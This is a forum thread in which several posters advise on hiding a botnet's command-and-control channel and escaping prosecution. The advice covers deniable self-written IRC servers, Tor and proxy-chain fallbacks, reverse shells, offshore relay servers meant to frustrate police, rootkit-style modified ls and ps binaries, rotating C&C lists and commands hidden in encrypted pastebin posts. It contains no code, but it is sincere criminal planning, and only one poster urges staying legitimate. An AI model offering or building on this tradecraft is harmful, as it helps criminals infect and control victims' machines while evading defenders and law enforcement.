Using a self-written message system as C&C

[tomba]

Hello. I think about techniques of running a backdoor C&C on a server without being charged with crime if somebody traces the backdoor's network activity too far.

An idea of me was  hosting an unsafe self-written IRC server which has no message cooldown etc. so you can use it as communication server for the backdoor but its not an illegal server. When you get caught you only have an IRC running as a server owner and you can say somebody abused it.

Does this seem practical?

[Jackal]

Well it really depends on what type of bots are you using I think a good way to cover up a linux botnet  is to set up a puppet master client configuration encrypting your traffic. Setting up a puppet master and agent configuration with like as many masters as you can get  use the tor module then changing the permissions for config file .
Now for Windows Malware it's the same principal but puppet isn't an option really all you can do is encrypt all the traffic, use multiple C&C servers have a reverse shell set up then get a few servers in the Ukraine or some shit to give the feds a hard time
Now these servers are simply a ]\nother layer of anonmity why because you set up IPTables rules to forward all communications of that type to the C & C servers.. Additionally for the puppet idea get some modified ls commands and ps commands that's a common rootkit tactic but those are my ideas. If you want more just hit me up

[Jackal]

Like IRC botnets are so 1990s and it's asking to get caught shit all the good botnets are using SOAP now adays anyways.

[n01xxv]

Some things :

• Do you think that police will not seize your server and discover that your IRC server is in fact a C&C ?
• Like Jackal says IRC's botnet are so old
• Try to use TOR ...

[Jackal]

no1xxv depends how he's using tor but from a windows malware point of view i dunno if it's the smartest idea because like sure you can use the communications means as c&c to host and use tor and not get caught and like that's the easy way but if he were targeting companies and the sys admin ran a port scan and sees a sketch port open on a windows work station where like there shouldn't be any ports open it's a fucked up situation but then again like you can use port 60 000 or some shit so no one will notice but I dunno I find the whole reverse shell thing better for windows trojans even though it's harder to implement from a dev and sys admin position. Still like shit should not depend soley on tor if tor doesn't work because it's firewalled you should write some error handling that will implement a regular socks4 proxy or make a chain of transparent http proxies after tor.

[n01xxv]

Humm ... if you but a malware that communicate with a C&C, this malware will act like a client, so you don't care about port scan ! And TOR client can be configure to go though firewalls ...
After if the target network have L7 inspection (IPS/IDS/L7 Firewall) you can find some evasion techniques.
But anyway IRC is too easy to detect.

[Jackal]

That's true but like we have to be specific here and well what bothers me in the corporate world is like assuming the have a well configured ASA a lot of the evasion techniques in the famous paper insertion, evasion, and DOS won't work so well when it comes to that but like you set up some solid key management for your command and control traffic  and do the error handling technique I put above  it can work well I also would think he should educate himself with windows and linux kernel internals before he attempts it. I think  but I prefer the reverse connection approach better in terms of shear stealth (most malware authors would agree)and chances are law enforcement in many eastern european countries won't exactly collaborate well (they are forwardig servers either way) with US law enforcement. The main issue I'd have with the general idea  is self encryption and decryption which is a major concern for any competent malware author. Why because we are going to have a list for legitimate C&C servers and any asshole analyst can simply just run the malware dynamically and then see where the traffic is going and put it up on a domain blacklist for the malware so you should constantly expand your C&C servers and update infected hosts with said lists. The main problem I have with the whole tor idea and using it as a service on the the infected host along with tor is another blackhat who is skilled with reversing can find such a thing out and take advantage of the backdoor present and simply write a script to send commands to that port why because you cant set up a proper filter for C&C when tor is in the equation and its running as a service sure people can do that with the linux idea I posted but like that thing is a beta idea for me. Sorry for my heatedness on the subject I don't come from these kind of places I usually hang out on Hell, Antichat, exploit.in so my posts will run loose on the ethics.

So really I don't think tor would be a good idea if you don't want your malware to be used as a backdoor for others. Unless you are using very specific relays or regular socks4 proxy chain

[riptorrent]

There was a guy with a proof of concept years ago using various social media messages. For instance the color of a profile picture could be an alias for a command etc. He had implemented it in ruby though. I can't remember the url or author but I believe it was found to be used in the wild as well. The way the IoT is catching on I would say one could hide out in some of that traffic.  There are so many ways to earn money besides being a botherder though. Be legit.

[Le Freak]

Just an idea: post encrypted instructions for your bots + unique search phrase to various pastebins. Bots are googling for the search phrase, parsing results and decrypting instructions. Change decryption password and search phrase everytime(include them in the instructions). For example, Google usually is indexing pastebin.com in 5-10 minutes. It is free, no need for a hosting and, theoretically, bulletproof.